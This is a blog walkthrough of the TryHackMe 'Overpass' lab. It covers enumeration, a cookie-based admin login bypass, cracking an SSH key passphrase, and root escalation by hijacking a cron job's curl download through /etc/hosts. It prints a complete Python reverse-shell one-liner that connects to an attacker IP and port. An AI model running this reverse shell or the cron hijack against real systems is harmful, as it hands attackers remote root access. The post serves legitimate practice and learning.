Open in app

Sign in

Write

Sign in

Overpass — TryHackMe: Walkthrough 🏴

Jovanski Wisuda
4 min readSep 5, 2023

--

What happens when some broke CompSci students make a password manager?

I created this walkthrough for documentation purposes, to make sure I remember what I’ve learned in this room. I do this for write up and grammar practice, lol. Let’s rock and happy hacking 🤘

Room URL: https://tryhackme.com/room/overpass
Machine IP Address : 10.10.228.4

The first thing to do is perform port scanning, and we can use nmap for that. It appears that there are two active ports: SSH and HTTP.

Since there are no hints for SSH, I tried accessing the website, and indeed, I was able to access it.

I proceeded with enumeration using the gobuster tool, and I found that there is a /admin directory.

Upon accessing /admin, I noticed a login page, but I couldn’t use command injection or SQL injection.

I attempted to inspect the web page, and I found some interesting information. There’s a login() function here.

I tried bypassing the login by creating the same cookies and then refreshing the page.

Here, I found a hint in the form of a “private key” and also a username, James, which seems like it will be useful later.

I created a file for the private key and tried to SSH using the username and private key. But there’s one problem; I didn’t know the key passphrase.

I attempted to remove the passphrase protection using ssh2john to extract the hash from the key, and it worked.

I tried SSH access again, and boom… I successfully logged in.

I explored further and found a text file named “todo” and also discovered the first flag.

Answer:

I attempted to find the second flag, but it seemed that this login did not have root access. So, I tried to access the crontab. It appeared that a cron job was running every minute. How could this be exploited? The script used curl to retrieve “buildscript.sh.”

I checked the /etc/hosts file and changed the IP address of “overpass.thm” to our own IP address.

I created a local reverse shell in the same location as the request from the cron job.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.0.54",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Set up a netcat listener on my computer.

Started my local web server, and it worked! I successfully sent our reverse shell.

Back to the netcat listener, we gained access with root privileges :) Of course, we obtained another flag in the process!

Conslusion:

Here, we have completed the overpass room.

Stay connected with me! Feel free to reach out through my social media

Linkedin : www.linkedin.com/in/jovanskiprmwsd

Tryhackme : https://tryhackme.com/p/un533nc0w

Email : jovanski.wisuda@gmail.com

Tryhackme Walkthrough
Website
Nodejs
Privilege Escalation
Bypass Login Password

--

--

Jovanski Wisuda

Written by Jovanski Wisuda

25 Followers

Cybersecurity Enthusiast | Lifelong Learner

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams